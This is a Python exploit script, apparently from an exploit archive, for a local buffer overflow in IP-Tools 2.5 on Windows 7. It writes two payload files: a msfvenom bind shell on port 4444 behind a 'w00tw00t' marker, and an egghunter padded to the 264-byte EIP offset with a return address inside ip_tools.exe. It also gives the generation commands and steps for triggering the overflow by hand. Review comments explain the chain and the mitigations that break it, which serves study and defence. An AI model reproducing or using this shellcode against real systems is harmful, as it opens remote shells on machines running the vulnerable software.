#!/usr/bin/env python
#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: IP-Tools 2.5 - Local Buffer Overflow(EggHunter)                                                                           #
# Date: 2019-02-06                                                                                                                   #
# Author: Juan Prescotto                                                                                                             #
# Tested Against: Win7 Pro SP1 64 bit                                                                                                #
# Software Download #1: https://web.archive.org/web/20070322163021/http://hostmonitor.biz:80/download/ip-tools.exe                   #
# Software Download #2: https://www.exploit-db.com/apps/4a83348f18a18ba34f9747648b550307-ip-tools.exe                                #
# Version: 2.5                                                                                                                       #
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine                                            #
# Steps : Open the APP > SNMP Scanner > paste in contents from the egg.txt into "From Addr" > "Start" > Click "Options" >            #
# "Host Monitor" --> "Logging" > paste in contents from the egghunter.txt into "Log to file" > OK > Bind Shell - Port 4444           #
#------------------------------------------------------------------------------------------------------------------------------------#
# Good Characters: alphanumeric and printable special characters                                                                     #
# EIP Offset Overwrite ("Log to file" field): 264                                                                                    #
# Non-Participating Modules: ip_tools.exe                                                                                            #
#------------------------------------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite -->                                                        #
# Stack Adjust (0x40) / RETN --> Egghunter Shellcode --> Egg Shellcode                                                               #
#------------------------------------------------------------------------------------------------------------------------------------#
#
# NOTE(review): This script sends nothing and executes nothing itself; it only writes
# two text files (egg.txt and egghunter.txt) whose contents the Steps above have the
# operator paste into two IP-Tools input fields by hand. Both payloads are produced by
# msfvenom's x86/alpha_mixed encoder (commands quoted below), which is what the
# "Good Characters" constraint above requires of the input fields. The overwritten
# return address is a fixed location inside ip_tools.exe (0x00473259, see `eip`), so
# the chain depends on that image loading at its preferred base with no ASLR/DEP —
# presumably what the "Non-Participating Modules" line (mona's protection check)
# records. Relinking the binary with ASLR/DEP, or bounds-checking the 264-byte
# "Log to file" field, would each break this chain.

##################EGG Shellcode Generation#################################
#msfvenom -p windows/shell_bind_tcp LPORT=4444 BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
#710 bytes + 8 bytes for egg identifier
# Layout of `egg`: an 8-byte marker "w00tw00t" (the 4-byte tag "w00t" twice, which the
# egghunter below scans memory for) followed by the encoded bind-shell payload. The
# encoder's BufferRegister=EDI option pairs with the raw egghunter's final bytes
# \xff\xe7 (jmp edi): after the tag compares, EDI points just past the marker.
egg = "w00tw00t"
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
egg += "\x69\x6c\x4b\x58\x6d\x52\x35\x50\x35\x50\x75\x50\x63"
egg += "\x50\x4f\x79\x4d\x35\x36\x51\x4b\x70\x71\x74\x6e\x6b"
egg += "\x36\x30\x46\x50\x6e\x6b\x66\x32\x44\x4c\x6c\x4b\x63"
egg += "\x62\x54\x54\x4c\x4b\x72\x52\x65\x78\x34\x4f\x68\x37"
egg += "\x52\x6a\x34\x66\x50\x31\x59\x6f\x4c\x6c\x57\x4c\x53"
egg += "\x51\x71\x6c\x67\x72\x54\x6c\x31\x30\x5a\x61\x58\x4f"
egg += "\x34\x4d\x56\x61\x4f\x37\x68\x62\x4a\x52\x36\x32\x66"
egg += "\x37\x4e\x6b\x36\x32\x42\x30\x6c\x4b\x50\x4a\x35\x6c"
egg += "\x4c\x4b\x72\x6c\x44\x51\x44\x38\x78\x63\x32\x68\x55"
egg += "\x51\x78\x51\x43\x61\x6e\x6b\x76\x39\x45\x70\x75\x51"
egg += "\x59\x43\x6e\x6b\x33\x79\x42\x38\x4d\x33\x65\x6a\x71"
egg += "\x59\x6e\x6b\x36\x54\x4e\x6b\x36\x61\x78\x56\x46\x51"
egg += "\x49\x6f\x4e\x4c\x79\x51\x7a\x6f\x66\x6d\x35\x51\x48"
egg += "\x47\x36\x58\x79\x70\x30\x75\x39\x66\x33\x33\x33\x4d"
egg += "\x58\x78\x57\x4b\x73\x4d\x56\x44\x53\x45\x48\x64\x61"
egg += "\x48\x4e\x6b\x72\x78\x67\x54\x57\x71\x69\x43\x73\x56"
egg += "\x6e\x6b\x54\x4c\x50\x4b\x6c\x4b\x53\x68\x37\x6c\x73"
egg += "\x31\x58\x53\x4c\x4b\x74\x44\x4e\x6b\x67\x71\x48\x50"
egg += "\x4f\x79\x70\x44\x36\x44\x76\x44\x51\x4b\x71\x4b\x55"
egg += "\x31\x46\x39\x32\x7a\x63\x61\x4b\x4f\x6b\x50\x53\x6f"
egg += "\x61\x4f\x61\x4a\x4c\x4b\x62\x32\x6a\x4b\x6e\x6d\x31"
egg += "\x4d\x63\x58\x75\x63\x54\x72\x35\x50\x45\x50\x33\x58"
egg += "\x52\x57\x33\x43\x36\x52\x73\x6f\x62\x74\x33\x58\x30"
egg += "\x4c\x31\x67\x54\x66\x63\x37\x69\x6f\x6e\x35\x78\x38"
egg += "\x4e\x70\x63\x31\x37\x70\x43\x30\x35\x79\x4f\x34\x32"
egg += "\x74\x46\x30\x51\x78\x36\x49\x4f\x70\x52\x4b\x63\x30"
egg += "\x59\x6f\x38\x55\x73\x5a\x43\x38\x70\x59\x36\x30\x49"
egg += "\x72\x59\x6d\x57\x30\x52\x70\x47\x30\x50\x50\x51\x78"
egg += "\x5a\x4a\x44\x4f\x6b\x6f\x79\x70\x39\x6f\x39\x45\x4f"
egg += "\x67\x65\x38\x44\x42\x77\x70\x64\x51\x71\x4c\x6c\x49"
egg += "\x6d\x36\x32\x4a\x72\x30\x63\x66\x56\x37\x30\x68\x68"
egg += "\x42\x4b\x6b\x64\x77\x61\x77\x59\x6f\x39\x45\x70\x57"
egg += "\x35\x38\x6d\x67\x68\x69\x65\x68\x59\x6f\x6b\x4f\x4a"
egg += "\x75\x36\x37\x75\x38\x34\x34\x58\x6c\x57\x4b\x4d\x31"
egg += "\x49\x6f\x4a\x75\x51\x47\x4e\x77\x55\x38\x32\x55\x52"
egg += "\x4e\x70\x4d\x43\x51\x39\x6f\x6e\x35\x51\x78\x70\x63"
egg += "\x32\x4d\x33\x54\x77\x70\x6e\x69\x68\x63\x30\x57\x63"
egg += "\x67\x30\x57\x55\x61\x6b\x46\x71\x7a\x56\x72\x31\x49"
egg += "\x62\x76\x6d\x32\x79\x6d\x55\x36\x6a\x67\x62\x64\x51"
egg += "\x34\x67\x4c\x73\x31\x33\x31\x6e\x6d\x71\x54\x44\x64"
egg += "\x66\x70\x39\x56\x43\x30\x77\x34\x43\x64\x76\x30\x72"
egg += "\x76\x61\x46\x50\x56\x32\x66\x30\x56\x62\x6e\x72\x76"
egg += "\x53\x66\x61\x43\x52\x76\x62\x48\x44\x39\x78\x4c\x45"
egg += "\x6f\x4f\x76\x69\x6f\x68\x55\x6b\x39\x39\x70\x42\x6e"
egg += "\x66\x36\x50\x46\x69\x6f\x36\x50\x75\x38\x33\x38\x4b"
egg += "\x37\x67\x6d\x73\x50\x69\x6f\x6a\x75\x6d\x6b\x58\x70"
egg += "\x4d\x65\x79\x32\x76\x36\x75\x38\x4e\x46\x6f\x65\x6d"
egg += "\x6d\x6f\x6d\x69\x6f\x79\x45\x35\x6c\x73\x36\x31\x6c"
egg += "\x44\x4a\x6b\x30\x79\x6b\x4d\x30\x73\x45\x74\x45\x6f"
egg += "\x4b\x30\x47\x32\x33\x31\x62\x72\x4f\x52\x4a\x37\x70"
egg += "\x72\x73\x49\x6f\x7a\x75\x41\x41"
# Text-mode write with no `with` block: if write() raised, close() would be skipped.
# Every character in `egg` is plain ASCII, so the bytes on disk are the same whether
# this runs under Python 2 or under Python 3 with any ASCII-compatible locale encoding.
f = open ("egg.txt", "w")
f.write(egg)
f.close()

##################EGG Hunter Shellcode Generation#################################
#encode egghunter code (looking for w00tw00t) (wow64 egghunter code produced by mona) into only alpha characters; egghunter shellcode preceded by xor edx,edx (start egg hunting at 0x00000000)
#echo -ne "\x33\xd2\x31\xdb\x53\x53\x53\x53\xb3\xc0\x66\x81\xca\xff\x0f\x42\x52\x6a\x26\x58\x33\xc9\x8b\xd4\x64\xff\x13\x5e\x5a\x3c\x05\x74\xe9\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xe4\xaf\x75\xe1\xff\xe7" | msfvenom BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egghunter -p -
#150 bytes
# Reading the raw bytes in the echo above: \x33\xd2 is the xor edx,edx mentioned in the
# comment; \xb8\x77\x30\x30\x74 loads EAX with the tag "w00t" (little-endian); the two
# \xaf (scasd) compares followed by \x75 (jne) back-edges require the tag twice in a
# row, i.e. exactly the "w00tw00t" marker `egg` starts with. The twelve encoded lines
# below total 150 bytes, matching the comment.
egghunter = ""
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
egghunter += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
egghunter += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
egghunter += "\x42\x75\x4a\x49\x35\x63\x4b\x62\x30\x31\x4b\x6b"
egghunter += "\x52\x73\x56\x33\x46\x33\x46\x33\x58\x33\x49\x50"
egghunter += "\x45\x36\x6f\x71\x6a\x6a\x6b\x4f\x46\x6f\x31\x52"
egghunter += "\x66\x32\x72\x4a\x55\x76\x32\x78\x70\x33\x38\x49"
egghunter += "\x6e\x6b\x5a\x74\x55\x34\x79\x6f\x37\x63\x53\x6e"
egghunter += "\x62\x7a\x55\x6c\x66\x65\x51\x64\x4d\x39\x48\x38"
egghunter += "\x30\x77\x50\x30\x70\x30\x74\x34\x4e\x6b\x58\x7a"
egghunter += "\x6c\x6f\x51\x65\x4a\x44\x4e\x4f\x42\x55\x79\x71"
egghunter += "\x69\x6f\x6a\x47\x41\x41"
#0x00473259 : {pivot 64 / 0x40}[IP_TOOLS.EXE]
# Little-endian encoding of 0x00473259 inside ip_tools.exe. The high byte is \x00 and it
# is the very last byte of `buffer`, so nothing after it needs to survive a C-string copy.
# This is the "Stack Adjust (0x40) / RETN" step from the header; the 0x40 adjustment
# presumably lands ESP back inside the overflowed field so the RETN reaches the encoded
# egghunter at its start — not verifiable from this file alone.
eip = "\x59\x32\x47\x00"
# 150 bytes of egghunter, "A" (\x41) padding up to the 264-byte EIP offset named in the
# header (264 - 150 = 114 bytes), then the 4-byte return address. Total length: 268.
buffer = egghunter + "\x41" * (264 - len(egghunter)) + eip
# Same text-mode write as for egg.txt; all bytes here are ASCII (including the
# trailing \x00), so the file content is interpreter-independent.
f = open ("egghunter.txt", "w")
f.write(buffer)
f.close()